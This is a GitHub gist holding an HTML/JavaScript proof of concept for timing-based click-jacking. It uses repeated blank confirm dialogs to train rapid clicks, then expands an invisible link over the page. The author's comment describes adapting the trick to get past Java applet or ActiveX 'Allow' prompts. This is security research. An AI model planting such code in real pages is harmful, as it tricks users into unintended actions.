Created
January 19, 2011 11:22
-
-
Save bcoles/786028 to your computer and use it in GitHub Desktop.
This script is a Proof of Concept for a timing-attack variation of UI Redressing / click-jacking. It is designed to entice the user into clicking rapidly in a certain location.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html><head><script type="text/javascript"> | |
| /* This script is a Proof of Concept for a timing-attack variation of UI | |
| Redressing / click-jacking. It is designed to entice the user into clicking | |
| rapidly in a certain location. */ | |
| function fast_clicks() { | |
| var tStart; | |
| var tDate; | |
| var tDiff; | |
| var answer; | |
| var fast_clicks = 0; | |
| // Hide overflow and set anchor background color | |
| document.body.style.overflow = "hidden"; | |
| document.getElementById("x").style.backgroundColor=document.body.style.backgroundColor; | |
| // Loop until the user clicks twice in a row at <400ms | |
| while (fast_clicks < 2) { | |
| tStart = new Date(); | |
| answer = confirm(""); | |
| tDate = new Date(); | |
| tDiff = tDate.getTime() - tStart.getTime(); | |
| tDate.setTime(tDiff); | |
| if (tDate.getTime() < 400) fast_clicks++; else fast_clicks=0; | |
| } | |
| // Expand the anchor over the entire page | |
| document.getElementById("x").style.width=screen.width; | |
| document.getElementById("x").style.height=screen.height; | |
| // Hide after 500ms | |
| setTimeout('document.getElementById("x").style.display="none";', 700); | |
| } | |
| </script></head><body onload="fast_clicks();"> | |
| <p>Hello World</p> | |
| <a id="x" style="text-decoration:none;padding:0;margin:0;border:0;display:block" href="http://irc.austnet.org:6667/" onclick="this.style.display='none'"> </a> | |
| </body></html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This proof of concept script is designed to demonstrate yet another method of tricking a user into clicking on a certain location. It is useless to an attacker verbatim. The same results could be achieved with
window.locationin JavaScript or a myriad of HTML tags such asscript, style, iframe.In the wild, rather than an anchor tag, the user would be more likely to click an invisible iframe or perhaps blindly click through the "Allow" button for a Java Applet - or an ActiveX control if they're running IE <= 7. This would require precise positioning of the
confirm("")dialog box by altering the length of the text. Alternatively, some browsers pop security dialogs in the center of the screen, unlike JavaScript which pops dialogs to the center of the browser. This may be (ab)used to position the "OK" button over where the "Allow" button for a Java Applet will appear by first resizing the window.